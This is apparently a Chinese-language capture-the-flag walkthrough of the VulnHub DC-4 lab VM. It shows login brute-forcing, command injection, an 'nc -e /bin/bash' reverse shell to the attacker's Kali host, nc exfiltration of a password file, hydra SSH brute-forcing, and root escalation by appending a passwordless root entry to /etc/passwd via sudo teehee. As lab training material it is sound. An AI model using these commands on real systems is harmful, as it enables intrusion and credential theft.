DC系列靶机 4/9
主要内容:burpsuite爆破登录框、抓包命令执行(RCE)、反弹shell、ssh爆破、teehee提权
官网下载地址:https://www.vulnhub.com/entry/dc-4,313/
作者主页下载地址:https://www.five86.com/dc-4.html
靶场描述:
信息收集
主机发现
arp-scan -l
192.168.1.186
端口扫描
nmap -sS -p- -A 192.168.1.186
扫出22
和80
端口
顺便用nmap自带脚本扫漏洞
nmap --script=vuln 192.168.1.186
扫出一个csrf
,没啥用
看看网页,一个登录框,源码没什么
爆破
爆破出账号密码
admin/happy
进入后台,发现有命令执行功能
命令执行漏洞(RCE)
抓包改命令
whoami
成功执行
发现用户
执行cat /etc/passwd
,发现三个用户:charles
、jim
、sam
反弹shell
kali:
nc -lvnp 2333
靶机:
nc -e /bin/bash 192.168.1.101 2333
用python实现交互shell
python -c "import pty;pty.spawn('/bin/bash')"
到处看看
www-data@dc-4:/usr/share/nginx/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@dc-4:/usr/share/nginx/html$ ls
ls
command.php css images index.php login.php logout.php
www-data@dc-4:/usr/share/nginx/html$ cd /home
cd /home
www-data@dc-4:/home$ ls
ls
charles jim sam
www-data@dc-4:/home$ ls -lah charles
ls -lah charles
total 20K
drwxr-xr-x 2 charles charles 4.0K Apr 7 2019 .
drwxr-xr-x 5 root root 4.0K Apr 7 2019 ..
-rw-r--r-- 1 charles charles 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 charles charles 3.5K Apr 6 2019 .bashrc
-rw-r--r-- 1 charles charles 675 Apr 6 2019 .profile
www-data@dc-4:/home$ ls -lah jim
ls -lah jim
total 32K
drwxr-xr-x 3 jim jim 4.0K Apr 7 2019 .
drwxr-xr-x 5 root root 4.0K Apr 7 2019 ..
-rw-r--r-- 1 jim jim 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 jim jim 3.5K Apr 6 2019 .bashrc
-rw-r--r-- 1 jim jim 675 Apr 6 2019 .profile
drwxr-xr-x 2 jim jim 4.0K Apr 7 2019 backups
-rw------- 1 jim jim 528 Apr 6 2019 mbox
-rwxrwxrwx 1 jim jim 174 Apr 6 2019 test.sh
这test.sh权限很高,不知道能不能用
www-data@dc-4:/home$ ls -lah sam
ls -lah sam
total 20K
drwxr-xr-x 2 sam sam 4.0K Apr 7 2019 .
drwxr-xr-x 5 root root 4.0K Apr 7 2019 ..
-rw-r--r-- 1 sam sam 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 sam sam 3.5K Apr 6 2019 .bashrc
-rw-r--r-- 1 sam sam 675 Apr 6 2019 .profile
www-data@dc-4:/home$ cat jim/mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
www-data@dc-4:/home$ ls -lah jim/backups
ls -lah jim/backups
total 12K
drwxr-xr-x 2 jim jim 4.0K Apr 7 2019 .
drwxr-xr-x 3 jim jim 4.0K Apr 7 2019 ..
-rw-r--r-- 1 jim jim 2.0K Apr 7 2019 old-passwords.bak
发现疑似可用信息
把old-passwords.bak
传出来
kali
nc -lvnp 2334 > old-passwords.txt
靶机
nc 192.168.1.101 2334 < jim/backups/old-passwords.bak
hydra爆ssh密码
通过上一部得到的字典是在jim
目录下发现的,就用来爆破jim
吧
hydra -l jim -P old-passwords.txt ssh://192.168.1.186
get
jim/jibril04
ssh登录
得到另一个密码
差点忽略提示:You have mail.
jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
得到用户Charles
的密码^xHhA&hvim0y
提权
切换用户,sudo -l
发现提示:teehee
命令可无密码以root
权限执行
可以用来写入文件,-a
参数可以附加不覆盖
echo "test1::0:0:root:/root:/bin/bash"|sudo teehee -a /etc/passwd
第2列为空,无密码,root权限
get
root
权限
flag
root@dc-4:/home/charles# cat /root/flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
总结
扫端口记录下来
burpsuite爆破登录账户密码
burpsuite改包命令执行,nc 反弹shell
到处看看有没有可利用的
拿到字典hydra爆ssh
邮箱找到另一个账号密码
找到无密码执行root权限的命令teehee
用teehee创建root权限无密码用户
得到最高权限的用户
get flag
彩蛋
www-data@dc-4:/home$ cat jim/test.sh
cat jim/test.sh
#!/bin/bash
for i in {1..5}
do
sleep 1
echo "Learn bash they said."
sleep 1
echo "Bash is good they said."
done
echo "But I'd rather bash my head against a brick wall."
以上